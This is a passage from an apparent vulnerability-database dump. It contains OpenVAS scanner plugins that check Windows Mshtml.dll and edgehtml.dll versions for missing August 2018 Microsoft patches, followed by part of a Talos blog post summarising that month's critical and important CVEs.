Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4343900\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nmsVer = fetch_file_version(sysPath:sysPath, file_name:\"Mshtml.dll\");\nif(!msVer){\n exit(0);\n}\n\nif(version_is_less(version:msVer, test_version:\"11.0.9600.19101\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Mshtml.dll\",\n file_version:msVer, vulnerable_range:\"Less than 11.0.9600.19101\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8377", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8387", "CVE-2018-8344", "CVE-2018-8400", "CVE-2018-8355", "CVE-2018-8350", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8383", "CVE-2018-8390", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-8399", "CVE-2018-8380", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8414", "CVE-2018-8347", "CVE-2018-8385", 
"CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8340", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "This host is missing a critical security\n update according to Microsoft KB4343909", "modified": "2020-06-04T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310813843", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813843", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4343909)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4343909)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813843\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-3615\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-0952\",\n \"CVE-2018-8200\", \"CVE-2018-8204\", \"CVE-2018-8266\", \"CVE-2018-8316\",\n \"CVE-2018-8339\", \"CVE-2018-8340\", \"CVE-2018-8341\", \"CVE-2018-8343\",\n \"CVE-2018-8344\", \"CVE-2018-8345\", \"CVE-2018-8347\", \"CVE-2018-8348\",\n \"CVE-2018-8349\", \"CVE-2018-8350\", \"CVE-2018-8351\", \"CVE-2018-8353\",\n \"CVE-2018-8355\", \"CVE-2018-8357\", \"CVE-2018-8360\", \"CVE-2018-8370\",\n \"CVE-2018-8371\", \"CVE-2018-8372\", \"CVE-2018-8373\", \"CVE-2018-8377\",\n \"CVE-2018-8380\", \"CVE-2018-8381\", \"CVE-2018-8383\", \"CVE-2018-8385\",\n \"CVE-2018-8387\", \"CVE-2018-8388\", \"CVE-2018-8389\", \"CVE-2018-8390\",\n \"CVE-2018-8394\", \"CVE-2018-8398\", \"CVE-2018-8399\", \"CVE-2018-8400\",\n \"CVE-2018-8401\", \"CVE-2018-8403\", \"CVE-2018-8404\", \"CVE-2018-8405\",\n \"CVE-2018-8406\", \"CVE-2018-8414\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 13:05:04 +0530 (Wed, 15 Aug 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4343909)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4343909\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the 
target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A new speculative execution side channel vulnerability known as L1 Terminal\n Fault.\n\n - Diagnostics Hub Standard Collector allows file creation in arbitrary locations.\n\n - Multiple security feature bypass vulnerability exists in Device Guard.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Internet Explorer improperly validates hyperlinks before loading executable libraries.\n\n - Windows Installer fails to properly sanitize input leading to an insecure library\n loading behavior.\n\n - Windows kernel and DirectX Graphics Kernel (DXGKRNL) driver improperly handles\n objects in memory.\n\n - NDIS fails to check the length of a buffer prior to copying memory to it.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - An improper processing for a .LNK file.\n\n - 'Microsoft COM for Windows' fails to properly handle serialized objects.\n\n - Microsoft browsers improperly allow cross-frame interaction.\n\n - Microsoft browsers allowing sandbox escape.\n\n - Microsoft Edge improperly handles redirect requests and specific HTML content.\n\n - Microsoft .NET Framework improperly access information in multi-tenant environments.\n\n - WebAudio Library improperly handles audio requests.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows PDF Library improperly handles objects in memory.\n\n - Microsoft Edge does not properly parse HTTP content.\n\n - Windows Shell does not properly validate file paths.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, run processes in an elevated context, obtain\n information to further compromise the user's system, trick a user into believing\n that the user was on a legitimate website, read privileged data across trust\n boundaries and also bypass certain 
security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1803 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1803 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4343909\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.17134.0\", test_version2:\"11.0.17134.227\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.17134.0 - 11.0.17134.227\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8266", "CVE-2018-3620", 
"CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "This host is missing a critical security\n update according to Microsoft KB4343892", "modified": "2020-06-04T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310813841", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813841", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4343892)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4343892)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813841\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-3615\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-0952\",\n \"CVE-2018-8200\", \"CVE-2018-8204\", \"CVE-2018-8266\", \"CVE-2018-8316\",\n \"CVE-2018-8339\", \"CVE-2018-8341\", \"CVE-2018-8343\", \"CVE-2018-8344\",\n \"CVE-2018-8345\", \"CVE-2018-8348\", \"CVE-2018-8349\", \"CVE-2018-8351\",\n \"CVE-2018-8355\", \"CVE-2018-8357\", \"CVE-2018-8360\", \"CVE-2018-8353\",\n \"CVE-2018-8370\", \"CVE-2018-8371\", \"CVE-2018-8372\", \"CVE-2018-8373\",\n \"CVE-2018-8381\", \"CVE-2018-8385\", \"CVE-2018-8389\", \"CVE-2018-8394\",\n \"CVE-2018-8398\", \"CVE-2018-8401\", \"CVE-2018-8403\", \"CVE-2018-8404\",\n \"CVE-2018-8405\", \"CVE-2018-8406\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 12:09:21 +0530 (Wed, 15 Aug 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4343892)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4343892\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A new speculative execution side channel vulnerability known as L1 Terminal\n Fault.\n\n - Diagnostics Hub Standard Collector allows file 
creation in arbitrary locations.\n\n - Multiple security feature bypass vulnerability exists in Device Guard.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Internet Explorer improperly validates hyperlinks before loading executable\n libraries.\n\n - Windows Installer fails to properly sanitize input leading to an insecure library\n loading behavior.\n\n - Windows kernel and DirectX Graphics Kernel (DXGKRNL) driver improperly handles\n objects in memory.\n\n - NDIS fails to check the length of a buffer prior to copying memory to it.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - An improper processing for a .LNK file.\n\n - 'Microsoft COM for Windows' fails to properly handle serialized objects.\n\n - Microsoft browsers improperly allow cross-frame interaction.\n\n - Microsoft browsers allowing sandbox escape.\n\n - Microsoft Edge improperly handles redirect requests and specific HTML content.\n\n - Microsoft .NET Framework improperly access information in multi-tenant environments.\n\n - WebAudio Library improperly handles audio requests.\n\n - Windows GDI component improperly discloses the contents of its memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, run processes in an elevated context, obtain\n information to further compromise the user's system, trick a user into believing\n that the user was on a legitimate website, read privileged data across trust\n boundaries and also bypass certain security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4343892\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17945\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.17945\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:29:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8358", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8347", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8253", "CVE-2018-8371", "CVE-2018-8340", "CVE-2018-8360", 
"CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "This host is missing a critical security\n update according to Microsoft KB4343887", "modified": "2019-12-20T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310813840", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813840", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4343887)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4343887)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813840\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-3615\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-0952\",\n \"CVE-2018-8200\", \"CVE-2018-8204\", \"CVE-2018-8253\", \"CVE-2018-8266\",\n \"CVE-2018-8316\", \"CVE-2018-8339\", \"CVE-2018-8340\", \"CVE-2018-8341\",\n \"CVE-2018-8343\", \"CVE-2018-8344\", \"CVE-2018-8345\", \"CVE-2018-8347\",\n \"CVE-2018-8348\", \"CVE-2018-8349\", \"CVE-2018-8351\", \"CVE-2018-8353\",\n \"CVE-2018-8355\", \"CVE-2018-8357\", \"CVE-2018-8358\", \"CVE-2018-8360\",\n \"CVE-2018-8370\", \"CVE-2018-8371\", \"CVE-2018-8372\", \"CVE-2018-8373\",\n \"CVE-2018-8381\", \"CVE-2018-8385\", \"CVE-2018-8388\", \"CVE-2018-8389\",\n \"CVE-2018-8394\", \"CVE-2018-8398\", \"CVE-2018-8401\", \"CVE-2018-8403\",\n \"CVE-2018-8404\", \"CVE-2018-8405\", \"CVE-2018-8406\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 11:42:20 +0530 (Wed, 15 Aug 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4343887)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4343887\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A new speculative execution side channel 
vulnerability known as L1 Terminal\n Fault.\n\n - Diagnostics Hub Standard Collector allows file creation in arbitrary locations.\n\n - Multiple security feature bypass vulnerability exists in Device Guard.\n\n - Microsoft Cortana allows arbitrary website browsing on the lockscreen.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Internet Explorer improperly validates hyperlinks before loading executable\n libraries.\n\n - Windows Installer fails to properly sanitize input leading to an insecure library\n loading behavior.\n\n - Active Directory Federation Services (AD FS) improperly handles multi-factor\n authentication requests.\n\n - Windows kernel, DirectX Graphics Kernel (DXGKRNL) driver and Win32k component\n improperly handles objects in memory.\n\n - NDIS fails to check the length of a buffer prior to copying memory to it.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - An improper processing for a .LNK file.\n\n - Windows kernel fails to properly handle parsing of certain symbolic links.\n\n - 'Microsoft COM for Windows' fails to properly handle serialized objects.\n\n - Microsoft browsers improperly allow cross-frame interaction.\n\n - Microsoft browsers allowing sandbox escape.\n\n - Microsoft .NET Framework improperly access information in multi-tenant environments.\n\n - WebAudio Library improperly handles audio requests.\n\n - Windows GDI component improperly discloses the contents of its memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, run processes in an elevated context, obtain\n information to further compromise the user's system, trick a user into believing\n that the user was on a legitimate website, read privileged data across trust\n boundaries and also bypass certain security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - 
Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4343887\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.2429\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.2429\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2018-09-08T09:19:42", "bulletinFamily": "blog", "cvelist": ["CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8204", "CVE-2018-8253", "CVE-2018-8266", "CVE-2018-8273", "CVE-2018-8302", "CVE-2018-8316", "CVE-2018-8339", "CVE-2018-8340", "CVE-2018-8341", "CVE-2018-8342", "CVE-2018-8343", "CVE-2018-8344", "CVE-2018-8345", "CVE-2018-8346", "CVE-2018-8347", "CVE-2018-8348", "CVE-2018-8349", "CVE-2018-8350", "CVE-2018-8351", "CVE-2018-8353", "CVE-2018-8355", "CVE-2018-8357", "CVE-2018-8358", "CVE-2018-8359", "CVE-2018-8360", "CVE-2018-8370", 
"CVE-2018-8371", "CVE-2018-8372", "CVE-2018-8373", "CVE-2018-8375", "CVE-2018-8376", "CVE-2018-8377", "CVE-2018-8378", "CVE-2018-8379", "CVE-2018-8380", "CVE-2018-8381", "CVE-2018-8382", "CVE-2018-8383", "CVE-2018-8384", "CVE-2018-8385", "CVE-2018-8387", "CVE-2018-8389", "CVE-2018-8390", "CVE-2018-8394", "CVE-2018-8396", "CVE-2018-8397", "CVE-2018-8398", "CVE-2018-8399", "CVE-2018-8400", "CVE-2018-8401", "CVE-2018-8403", "CVE-2018-8404", "CVE-2018-8405", "CVE-2018-8406", "CVE-2018-8412", "CVE-2018-8414"], "description": "Microsoft released its monthly set of security advisories today for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 62 new vulnerabilities, 20 of which are rated \u201ccritical,\u201d 38 that are rated \u201cimportant,\u201d one that is rated moderate and one that is rated as low severity. These vulnerabilities impact Windows Operating System, Edge and Internet Explorer, along with several other products.\n\n \n\n\nIn addition to the 60 vulnerabilities referenced above, Microsoft has also released a critical update advisory, ADV180020 which addresses the vulnerabilities described in the Adobe Flash Security Bulletin APSB18-25.\n\n \n\n\n### Critical Vulnerabilities\n\n \n\n\nThis month, Microsoft is addressing 20 vulnerabilities that are rated \"critical.\" Talos believes 10 of these are notable and require prompt attention.\n\n \n\n\n[CVE-2018-8273](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8273>) is a remote code execution vulnerability in the Microsoft SQL Server that could allow an attacker who successfully exploits the vulnerability to execute code in the context of the SQL Server Database Engine Service account.\n\n \n\n\n[CVE-2018-8302](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8302>) is a remote code execution vulnerability in the Microsoft Exchange email and calendar software that could allow an 
attacker who successfully exploits the vulnerability to run arbitrary code in the context of the system user when the software fails to properly handle objects in memory.

[CVE-2018-8344](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8344) is a remote code execution vulnerability that exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploits this vulnerability could take control of the affected system. This vulnerability can be exploited in multiple ways. In a web-based attack, an attacker can convince a user to visit a web page that has been specially crafted to exploit this vulnerability; this could be an attacker-controlled web page, or simply a page that hosts external content, such as advertisements. An attacker can also provide a specially crafted document that is designed to exploit the vulnerability, and then convince users to open it.

[CVE-2018-8350](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8350) is a remote code execution vulnerability that exists when the Microsoft Windows PDF Library improperly handles objects in memory. An attacker who successfully exploits the vulnerability could gain the same user rights as the current user. The vulnerability can be exploited simply by viewing a website that hosts a malicious PDF file on a Windows 10 system with Microsoft Edge set as the default browser. On other affected systems, which do not render PDF content automatically, an attacker would have to convince users to open a specially crafted PDF document, such as a PDF attachment to an email message.

[CVE-2018-8266](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8266), [CVE-2018-8355](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8355), [CVE-2018-8380](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8380), [CVE-2018-8381](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8381) and [CVE-2018-8384](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8384) are remote code execution vulnerabilities that exist in the way the Chakra scripting engine handles objects in memory in Microsoft Edge. An attacker who successfully exploits one of these vulnerabilities can potentially gain the same user rights as the current user. They could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit the vulnerability; this could be an attacker-controlled web page, or simply a page that hosts external content, such as advertisements.

[CVE-2018-8397](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8397) is a remote code execution vulnerability that exists in the way the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploits this vulnerability could take control of the affected system. This vulnerability can be exploited in multiple ways. In a web-based attack, an attacker can convince a user to visit a web page that has been specially crafted to exploit this vulnerability; this could be an attacker-controlled web page, or simply a page that hosts external content, such as advertisements. An attacker can also provide a specially crafted document file that is designed to exploit the vulnerability, and then convince users to open it.

Other vulnerabilities deemed "critical" are listed below:

- [CVE-2018-8345](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8345) LNK Remote Code Execution Vulnerability
- [CVE-2018-8359](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8359) Scripting Engine Memory Corruption Vulnerability
- [CVE-2018-8371](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8371) Scripting Engine Memory Corruption Vulnerability
- [CVE-2018-8372](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8372) Scripting Engine Memory Corruption Vulnerability
- [CVE-2018-8373](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373) Scripting Engine Memory Corruption Vulnerability
- [CVE-2018-8377](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8377) Microsoft Edge Memory Corruption Vulnerability
- [CVE-2018-8385](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8385) Scripting Engine Memory Corruption Vulnerability
- [CVE-2018-8387](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8387) Microsoft Edge Memory Corruption Vulnerability
- [CVE-2018-8390](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8390) Scripting Engine Memory Corruption Vulnerability
- [CVE-2018-8403](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8403) Microsoft Browser Memory Corruption Vulnerability

### Important Vulnerabilities

This month, Microsoft is addressing 38 vulnerabilities that are rated "important." Talos believes two of these are notable and require prompt attention.

[CVE-2018-8200](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8200) is a vulnerability in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploits this vulnerability can potentially inject code into a trusted PowerShell process to bypass the Device Guard code integrity policy on the local machine. To exploit the vulnerability, an attacker would first have to access the local machine and then inject malicious code into a script that is trusted by the policy. The injected code would then run with the same trust level as the script and bypass the policy.

[CVE-2018-8340](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8340) is a vulnerability in Windows Authentication Methods that enables an Active Directory Federation Services (AD FS) security bypass. An attacker who successfully exploits this vulnerability could bypass some, but not all, of the authentication factors.

Other vulnerabilities deemed "important" are listed below:

- [CVE-2018-0952](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0952) Diagnostic Hub Standard Collector Elevation of Privilege Vulnerability
